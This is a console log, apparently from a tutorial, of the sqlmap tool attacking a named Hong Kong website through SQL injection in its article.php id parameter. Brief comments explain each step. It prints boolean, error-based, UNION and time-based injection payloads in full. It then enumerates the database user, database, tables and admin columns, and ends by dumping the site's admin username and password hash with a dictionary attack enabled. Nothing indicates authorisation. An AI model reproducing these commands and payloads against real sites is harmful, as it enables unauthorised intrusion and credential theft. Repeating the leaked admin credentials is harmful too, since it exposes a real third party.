D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0 /* get the column names of the admin table */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>